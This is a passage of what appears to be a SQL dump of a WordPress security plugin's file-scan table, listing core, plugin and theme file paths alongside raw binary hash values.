�','',0,'?'),('>5��ˏ.y2Q[ڣ�1�','wp-includes/blocks/block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/�䲑[���5�����','�g�BT�%�.s�;�m�q}S8g�`��+1{�B','',0,'?'),('>@�e�T$q��Q��d','wp-includes/wp-includes/vars.php',0,'�\Zm���f1q��˴','�\Zm���f1q��˴','�nl\Z���h�1he�-�M��5�Nl��bd�Hpz�','',0,'?'),('>G��O�jP�l���B','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/cast_to_int.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�����\'Ρ0�g2','ؚx\"�o�*I�\nQ��j�����T(�G\Z�.�\Z','',0,'?'),('>I��\'@��`�kg܂R','wp-content/themes/twentytwentythree/templates/blog-alternative.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��������WW���','m�Uvco[Y����)��B�&���j��Ůw�','',0,'?'),('>Ty�I�ޯ�4�[�','wp-content/plugins/all-in-one-wp-security-and-firewall/vendor/composer/InstalledVersions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q~�f��������\"�','p,�-�gW���Ԏ��W��.c�E����M','',0,'?'),('>^��m������Z�{�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/TransferStats.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fv��3ur�lAgh','x�-mx�����^�j�C�1���H,,R����','',0,'?'),('>d�RLډDh�uJH���','wp-content/plugins/wp-cerber/assets/bn5ra.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڑ����@�/�@�','\0�o �~�}�2�,_*Í {J�O�4SfY��','',0,'?'),('>hЩ�XX*�v1���','wp-includes/theme-compat/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ϫ�-�Y�D��s��','���A8}���G(oܵ����SQ��:z��b','',0,'?'),('>l��b��{��NhE�','wp-content/themes/hitmag/inc/kirki/core/class-kirki-l10n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','έqJ��X���v�-�h','��~��N�5��\'\\�����>�-d�z*m6','',0,'?'),('>ql�+�m�\05Ħ\"�^','wp-includes/js/customize-preview.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','52��bX�9x8�M�','i������ڟ��Ý�����L����!��@','',0,'?'),('>u��ʸ�!4N2��','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmEU9fBBc-AMP6lQ.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,�;L�\'��dee��','�+G�T}�m)*��[���c5�Z�N-v>�','',0,'?'),('>��pu��L3Ij�^�bo','wp-includes/blocks/comments-pagination/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0s����n5:�(v','�۾��zq1 �	�tk7��= o�OJ1��','',0,'?'),('>�o�������t�+','wp-includes/blocks/post-terms/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�h�T[�<���+J','��7���+1\r�j��]��gRJ��9�Kah','',0,'?'),('>��X�\r�b��ڟ�$W','wp-includes/class-wp-image-editor-gd.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'Ǹ\n�R�fɦ��','YQ�ɷˁ��������Q�.*\"M,4�d','',0,'?'),('>��%�����H��','wp-includes/blocks/template-part/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',f4b��L�U�Y0�A�','�;MDmWl]8�����\nYŸ���!��\0�','',0,'?'),('>����\0�V?s�\Z��','wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-collapsible.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ˡ�kI�9���H���','XikWM��0���� \n.���S7�f\0��x','',0,'?'),('>��Gf�@�Tម;�D�','wp-includes/blocks/cover/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C�#G�Lb�}I�','��������sW��\'�E��F$s/�����','',0,'?'),('>�˾Q\"<�1s1�ҹ�','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/ro.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N��S,�WA|�J��r�','�v�j-���C�lw�w�J2o=�l���o���','',0,'?'),('>��m\\Vӻ���R3','wp-includes/wp-includes/images/media/default.png',0,'-����I�B�h�@���b','-����I�B�h�@���b',':�oL�JDj�$->�i��\'�6n֠��Ui','',0,'?'),('>�N;��}[��#��','wp-content/plugins/wp-cerber/assets/flags/tn.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�oȩ����K�S:','�0Od�<q���ޤ&Gg#X5��\r���s�4�K�','',0,'?'),('>��	DUٹ�20���','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-multicolor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&���\Z���kV�+�[','�����8k4�!V�13���w�2�s<�3','',0,'?'),('?�WZBD�N�1�3��','wp-includes/blocks/audio/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�*��O\Z�Gcu�_�H','�)NO�x-�ƌ^�F�s\Z��+�����[9��s','',0,'?'),('?ë�7�p3��Gi[r�','wp-content/plugins/wp-cerber/assets/flags/lv.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ko\\`���N\'���','8�Kn�Y@\n�s�\'F]�����Z','',0,'?'),('?��su[��\0RBa','wp-content/plugins/wp-cerber/assets/flags/sj.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']̧%W?,OS�c�rs�','�޶#��` CUꦭ���W�5M�p1�\Ze\r���','',0,'?'),('?�A��>!�d-�`�','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/selectWoo.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9~!��ץ�95��t�','�B?���i0��s��\r�+��T\Z����Q��l��e','',0,'?'),('?���p|R�o��','wp-includes/blocks/separator/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��P�j�JT���hR3r�','��z��[��ܦ.h��U��f���hj��,z','',0,'?'),('?2yT!s|��t��u}','wp-includes/random_compat/random_bytes_dev_urandom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4���kIT���=ր/','��|���5/�i�VV#�V���A����`','',0,'?'),('??Q$�P���.:X6','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-fast.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���0@�I�SB','�1����đ���,�h�-��h�>fھ�G]','',0,'?'),('?M��(0����BӇ1V','wp-content/themes/hitmag/inc/kirki/core/class-kirki-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�yW��\n�@�*rܬ�','�y���IJ��O�;5�ֲgi��՝��[���','',0,'?'),('?U������\'_l.�p','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o>B��	����IN�-y','��hl�[�������(�l~�Q�u�FM�	�','',0,'?'),('?X\\�mf��ڕڣ�g','wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy-columns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zW:\\�!O�������','\rp�����燋�r�=bm�?W�n1Q��@5�','',0,'?'),('?Yv�q_����ۮXO','wp-content/plugins/wordfence/images/sort_both.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%�B�Qx�SV.D','����6��\"@X�g\'�W7��w��gJ���q','',0,'?'),('?]�P�.��1����2b','wp-includes/js/tinymce/plugins/textcolor/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%i�3����f����','(��EL����b[��K�!s�ӊ�nIJ��','',0,'?'),('?d��#����c�e','wp-content/plugins/wordfence/css/dt_table.1647958122.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�gJbj�J��9�k:�','o[P�HyЊ}���iGc�~��<c�D�R:D�','',0,'?'),('?f�z�&,=��F���','wp-content/plugins/wordpress-seo/src/deprecated/src/presenters/admin/link-count-indexing-modal-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W��,�3���Ӕ��[','�olL%�e&æ#M��\n�$����y�f�','',0,'?'),('?h�h�:z͏qZi�V','wp-includes/blocks/post-author-biography.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]0ڙ�Z\'f��','�m��vE;���t�!��XR�.C�EcR��J�n','',0,'?'),('?��=�@�M�$#��P7','wp-includes/js/dist/html-entities.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/�v�^�r�����h','CggV�f�@�g󻘱�*�nEB�Vf�X��','',0,'?'),('?��䳝q2i��<3�','wp-content/plugins/wp-smushit/app/assets/fonts/wpmudev-plugin-icons.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�\rV��ye����i�f','A�x��\0��������h���','',0,'?'),('?�I��8G?ՔB[��','wp-includes/wp-includes/registration-functions.php',0,'�Q<۾\Z7�M�v��','�Q<۾\Z7�M�v��','Kd���_�MF� X��X�.,\'T\\��6���6','',0,'?'),('?�4!�5ԣ�\"̘��S','wp-content/plugins/wordpress-seo/admin/class-yoast-network-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�RrP>�Ζ��]��','�d\n9}�\nN�ij l�4h��G�=m\\L�1��(HQ','',0,'?'),('?�cF	m��wI_��','wp-content/plugins/all-in-one-wp-security-and-firewall/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����<���7���J�','4�2�LX���H�=�+\r�p�,D�Q���','',0,'?'),('?����uKUU\0�0G��P','wp-content/plugins/wp-cerber/assets/flags/mo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\n�?�!�{��Bl','�\Z�	��Ɖz��x��_�}��M�(�q2qx�','',0,'?'),('?�^�.+��t\Zɻ�$L','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/Header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���xzp��D��(','�p���U���BL�gq5��O����AĈs','',0,'?'),('@\0��8(<:�t�#1�S','wp-includes/css/dist/block-editor/default-editor-styles.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7�䆜�~h�?��','�|DŽ�\Z��D�~�X���E���)>��2�,','',0,'?'),('@��A�)2��oѦ0','wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-webpage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���,�ӥ4�Fқ��','ؐy��5�\Z�%Y��,��U�9�j��X\0�5��','',0,'?'),('@?`�\r�\'n�B�@\\�','wp-content/themes/hitmag/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'����ɺ��¾g','��/�3�	��h��l��*�*u��ߣŴj�>�)','',0,'?'),('@C������Y5a�+��0','wp-content/plugins/wordpress-seo/css/dist/toggle-switch-1851.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D�N&��k����H�}','�%́\0.�����R�TSǧ�V�O��C��C�','',0,'?'),('@N3�0�>�`8l��','wp-content/plugins/wordpress-seo/src/presentations/indexable-date-archive-presentation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^�����1��','4]N�OW���\0V�қ�kҝ�v2~�_[T[N','',0,'?'),('@V�K$~`*�+c�0�','wp-includes/block-patterns/query-medium-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���<��U�V��n�','#l.�C��v��*�������;��!�4�f','',0,'?'),('@V�$�K���<�1*�','wp-includes/css/jquery-ui-dialog.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S`���7у�-�','j�&�Ұ�M������u�@��6L}�5����{','',0,'?'),('@Y�ӓ�\\˳c�z�','wp-includes/wp-includes/images/down_arrow.gif',0,'���V�~�o�YnG~_u','���V�~�o�YnG~_u','��h�8ɧ���p�u�{�9������J���','',0,'?'),('@h볹�3�אz2zl�','wp-includes/css/dist/edit-post/classic.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q4��%��TT�G�)��','��G_��|�^~�@\r#��*�VET��<�','',0,'?'),('@k/�����I�?T,','wp-includes/js/jquery/ui/datepicker.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y�\"��zP%�hGy�',',2�urFI�MKP�ĉ�����nW%�^#���L','',0,'?'),('@��̘9�#�L�y(��','wp-includes/images/arrow-pointer-blue.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w��b�·*L���[��','����fb�ZD1.���V��aw�4l?��p�G^�{','',0,'?'),('@��v\nϗ����Z�(','wp-content/plugins/wordpress-seo/admin/views/class-view-utils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oIJ�@!\r�Ʈ@9�Ҽ�','̛U�6�s�.t2�,c^*,ɯ��~/s(','',0,'?'),('@���8��\"��% �','wp-includes/wp-includes/images/smilies/icon_mad.gif',0,'V�!�@�c�0�S�','V�!�@�c�0�S�','�������d[O:LJ�����jl}�q�','',0,'?'),('@��mW�L�W$�D/\n','wp-content/plugins/all-in-one-wp-security-and-firewall/vendor/composer/ClassLoader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"UE\"�Eb;D�n�','��Ա�r�g���CXJU�1��։Ya,��1','',0,'?'),('@��L���:���(���','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/psalm-autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p��\0�6�&�	�','uj���v��d_���=\n�2fY+��V\\��','',0,'?'),('@��_/��d=���','wp-includes/wp-includes/class-wp-recovery-mode-link-service.php',0,'�����}f/c�nx5','�����}f/c�nx5','�k�������ޙ(Z��t�M\0��;�t\r','',0,'?'),('@��)Zλd2�0�V�-','wp-content/plugins/wp-smushit/app/assets/fonts/widget-background-smush.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P��\r��P->�R4�','waA�]k�>=|�Otu��m�j��כ��,�','',0,'?'),('@���3)���-x��M��','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/fa.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u$���Z�i�B�\0�','V�h�\'7�[[�i��?����<��F�=[','',0,'?'),('@��C��E\'�O����','wp-includes/css/dist/widgets/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r�@؍\\�U�w��d','N~��)�H?e��0�L�?ߑ�׻z\Z&>ȥ�6�','',0,'?'),('@��\Z!z��r���W��p','wp-content/plugins/wordfence/views/waf/option-rules.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)\0�Q�N��#$|�','��t�Ϸ\0\re(x�T�n��_C�Q��=��K2U�C','',0,'?'),('@�XD\n�\nRN��t���','wp-admin/images/menu.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�9#�d�Y`	���','�l��IE/(�p��\0�pn�T-O�z\"],=`�','',0,'?'),('@�ȯ��&O�o���','wp-content/plugins/wordfence/lib/noc1.key',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9e�b\0��PO�����','_�u���j������P��-KOA�ܫ�����','',0,'?'),('@ɰktg��\r�힒�','wp-includes/wp-includes/js/dist/vendor/wp-polyfill-formdata.min.js',0,'.�2ң��A�!�V0I','.�2ң��A�!�V0I','�\"CG9^��ȷ�1��a�?�a�uk`','',0,'?'),('@�[�`X@f�ba�rkp','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/date-archives-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,��9p�+��?�g','�JƐ�`�����ɍ�eC�Br���w�7)','',0,'?'),('@�L��߯7�٭kقE','wp-content/plugins/wordfence/lib/menu_tools_twoFactor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`3��0�h~�ݻ����h','�ZR\'��Z�w�$߃��_ɐxT�{-`��','',0,'?'),('@�;5�X��V��O�Z','wp-admin/images/mask.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���g~�\"��J��䩎�','��/<s�ԡ�)�\'�.�1��jkn�K9Q���','',0,'?'),('@�m����O��W','wp-admin/admin-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�\r��P�p��_Z�','q�M�l��b�kC��;߽��6�#�Y�b�','',0,'?'),('@�t�R>G�Hh��ס','wp-admin/css/revisions-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!^#�֜*X�!�4Q�','w�/���,f�Ёu9���y�]�[��tH6/','',0,'?'),('@�s�Z��^����q�v','wp-admin/images/media-button-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�WI��\\��?��','�<�:��tn�kb�wi�&��	��R����\Z','',0,'?'),('@��+�T΄\'����٤','wp-includes/ID3/module.audio.flac.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@pL�@���E���{��','�ּ3��t�46$ay�!���֦ȓڲ�h#�{�','',0,'?'),('@��9bv3-�2��','wp-content/aiowps_backups/index.html',0,'��ُ\0��	��B~','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('A	��l�e8ߒߊ(\"��','wp-content/plugins/wordpress-seo/src/deprecated/admin/onpage/class-onpage-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_��y�����[~-�',' �:DBL�=Y�Y��wCk=zghi3 ����*�','',0,'?'),('A�lA~i^����u�Ø','wp-admin/css/customize-nav-menus.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';k)1�D��\r�v0��','I�� ��R$I�1g ?�e8,�Q��d���C','',0,'?'),('AE���[�`����','wp-includes/js/thickbox/thickbox.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zW^�N|!%E���>]�','\\.VE�H��e��\Z��D�dG���U�s�CؑƧ�','',0,'?'),('A\"~ی5)��N�W�n','wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EKgf1�,%�����','̎ph�3���\0��{�\\��A-����Ke�f�','',0,'?'),('A+~/Ję4���$Y*��','wp-includes/block-supports/spacing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P\n�j偫��\"{H','����#h�{�)	ϙ��;�X��_E�ۛ(','',0,'?'),('A2GD���̇w^�^\Z{�','wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-router.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','β⭎�h���͵7�U','�@�Njh����a�בi��d���z\n=�','',0,'?'),('A4��r��ɽv���@','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Token/ResourceOwnerAccessTokenInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c����f���z�~O','O\'a\Z��?*!�6үu���M������H','',0,'?'),('A;�ت\Z���ܦ�z�','wp-includes/sodium_compat/lib/constants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����{�#��l�>m','��ٹmc(�l��\'�mt�ˣ�[��g��W','',0,'?'),('AK<���j���gsr�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4��Kb(�\\��p�B-','�ճ* ʰ	���[q��˜P���k�','',0,'?'),('AV�_tIC�@UU���','wp-includes/wp-includes/css/dist/components/style.min.css',0,'c��`=\"����y�)','c��`=\"����y�)','�xp�3�>9eQ<�jCQ���g@M�/�w','',0,'?'),('AỶ�k��{�v�r','wp-content/plugins/redirection/api/api-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��q\r�$�:i��f','ϪVA��7.T��������1b\ZĽ���ޱ','',0,'?'),('A_e�.阧\'B���\\','wp-includes/blocks/navigation/view-modal.min.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ؗ�]r�ËI�?�s�,','��h�\n [R����o����r�@i���w�','',0,'?'),('Aa�@J������Ł�','wp-includes/js/tinymce/plugins/colorpicker/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' C��ȭ?d�{׭V��','���B��R�\0�!�䄚����Q�����\'5w','',0,'?'),('As�v���g�4U�','wp-includes/js/dist/nux.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�p�\r��c�\r��','g�F=j��65�a�?N�Jah���W�,','',0,'?'),('A{&� ��V>��Νs','wp-admin/css/login-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L~�b�fm�1M\\�W-r','Y�1O/�o��\"�4�8G�h�֞�����Bq���e','',0,'?'),('A�`	2���T��]��','wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/core/stylesheetwaiter.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�M�-\r�m3��Qr\'�','�\nz�����V�nA{�tG��������g','',0,'?'),('A�Kd��\n6���','wp-includes/wp-includes/customize/class-wp-customize-partial.php',0,'J@�N-p<�1]\Z�n�','J@�N-p<�1]\Z�n�','ƪ�㫾������s�uu��nΐ\0��V<1�r','',0,'?'),('A�X�\0�l�Ά7�KBh','wp-content/plugins/wordpress-seo/src/generated/assets/languages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��Ȉ�D)�<�y3�7','���ԊX�ƄB�$�6���:0Ӆ@Y󮪬�','',0,'?'),('A����I7Y������','wp-content/plugins/redirection/locale/redirection-sv_SE.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',\"�}$������7��','an���N�:^�x���I.m�澎�2��','',0,'?'),('A��8V,�_O�X�4���','wp-includes/rest-api/endpoints/class-wp-rest-sidebars-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ĺ�7�`)�s^c��','�Dgs�����P�o����.\rS_%B1$CjO�\0','',0,'?'),('A�[\Zϸ�.�e���','wp-includes/wp-includes/js/tinymce/plugins/fullscreen/plugin.min.js',0,'Ғ:�K�[�Iw\\��g�','Ғ:�K�[�Iw\\��g�','`e��	�n��O���JM�%�N�hA�{gh�f','',0,'?'),('Aػ#���\"���j�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-roadblock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J<1/%$�J�=Δ�','��v����p	eKK�7��9���8����������','',0,'?'),('A��W�`롢P�,Z8�','wp-includes/wp-includes/wp-db.php',0,'��yAS9�ie��P�','��yAS9�ie��P�','����I�&���e�*��7�K38�����','',0,'?'),('A��\n7H;W��_��L�I','wp-includes/wp-includes/js/tinymce/plugins/directionality/plugin.js',0,'&�\"�X	& )��=ʀ$','&�\"�X	& )��=ʀ$','�&�[�@��5��(��cv��L��YI6�B;)-','',0,'?'),('B^��t�p�k���!�','wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�*L�TG��4%P���','-������n�F�J�&T�P�o\\ϓ\\����2���','',0,'?'),('B\' `0��zynã|�','wp-content/plugins/wordpress-seo/src/integrations/estimated-reading-time.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�D�iID��9�#�','��3�\0���{s����/s��9�*����','',0,'?'),('BFV�͔�/4y97�','wp-content/plugins/wp-cerber/assets/flags/si.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:㑏��5I�','� �P�l��a��U\0���O�,���0��','',0,'?'),('BJ��O������z�D�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{�1�MR�KE_�/','|q�UUѿÎ|z��G>*�ۜ\"���I����;�','',0,'?'),('BUj�v\\ѣ����(�','wp-content/plugins/wordfence/views/common/license.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:8�����^�r','�f�B�-h������^�>A���nH0�\r&��','',0,'?'),('Bs��塘T����L�=','wp-includes/blocks/calendar/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','14-�9F�&5f4��(','�g����j�v ���AU��$jl�?��…���','',0,'?'),('B��j�)��q�D�S','wp-admin/install-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Nu�%� 35\'��}A���','k��\Z��c$Xt\n�\Zu��ܪC?h�\"�`�','',0,'?'),('B��x	�	���~�','wp-content/themes/twentytwentythree/patterns/call-to-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���l�vt��TxGA','�	��A!B\\ݰ�#������&�Ub\'����','',0,'?'),('B��A�z��mvs���\r,','wp-includes/wp-includes/rewrite.php',0,'7\0B6\"��–�7��X�','7\0B6\"��–�7��X�','�\n����בu��������5$E��i�4I�d','',0,'?'),('B����Q���aU�%','wp-content/plugins/wordfence/views/scanner/issue-knownfile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ȓ�Sd�9Q!\Z�p�3�','�.:�����2KS1�vG��HV','',0,'?'),('Bϵ���H@x���/','wp-content/plugins/wordfence/waf/pomo/po.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�vc+p*�\"G��?�B','�MO(��� G\rkHԽ�eq��	�Lj�F�o�O�-','',0,'?'),('B�P�X�W��6��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int64.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �QA�L���󚜆U�','���G��\n<.\ZW�r���ʪ��Ø�)','',0,'?'),('B��%m�Oj~��� ���','wp-content/plugins/wordpress-seo/src/presenters/admin/migration-error-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�v�һ�K�:����','�2����\"+�Ԥ���+c�h��r%�3�5E','',0,'?'),('B�c/�^S3I�-FL','wp-content/plugins/wp-smushit/app/assets/images/plugins-hummingbird-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q0=#��v��7��T','���\\���E�)>@�{ڳ�~HD�����P>Mn','',0,'?'),('Cڗ�i���F!�','wp-includes/wp-includes/js/jquery/ui/spinner.js',0,'�8��TXi�M�Y�','�8��TXi�M�Y�','�>�qJط���0� �\'���R\'n�7s�b3|','',0,'?'),('C!n��$�O���Q+','wp-content/plugins/wp-smushit/app/assets/images/vline-rtl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O*j㤡���]���','�ʪ��5�j[J׉�if�j��Zۙ���jy9�','',0,'?'),('C%��S(���5��','wp-content/themes/hitmag/inc/widgets/block-posts-dual.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2Knv���\"�[','�jE�#DO꧆�e���(жAC0t�7��?��','',0,'?'),('C\'�RT7nn����','wp-content/plugins/wordpress-seo/src/services/importing/aioseo/aioseo-robots-provider-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ӏ����os�','���Q-�2ϳg�j���]�\0�U垡r��̿a','',0,'?'),('CC?����c:�W=طEf','wp-includes/wp-includes/sodium_compat/namespaced/Core/Util.php',0,';��*�kLwB��d�=',';��*�kLwB��d�=','ec[d�M?H�|�KY�\04��@� QA��:FF �','',0,'?'),('CK�J��6LAM�kV','wp-includes/blocks/post-date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]�j�H��b/���\Z','�h�9r6���\n_���##LJ)��%g�d�','',0,'?'),('C|z;���E��w��','wp-content/plugins/wordfence/js/jquery.tmpl.min.1647958122.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\}�\"���7ڷ��DZ','�.I�H\Z�g\0�H!7`��gޠZ�zȄ�ž6|','',0,'?'),('Cc�iF��h�.n7�','wp-includes/rest-api/endpoints/class-wp-rest-settings-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{�P!|܃�@���tI','_:&��Ќ�0��)P��$L�m��:_d��8��-�','',0,'?'),('C���I���S7�<','wp-content/plugins/wordfence/modules/login-security/views/page/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ш>\\g��ǡ�$��c�','��ii��G�C����N�FL�)7%�ʙ�','',0,'?'),('C�3?�ݳ�4]x�','wp-includes/wp-includes/customize/class-wp-customize-upload-control.php',0,'ؓ�B8�?)ivr��`-�','ؓ�B8�?)ivr��`-�','�~t~��X���% 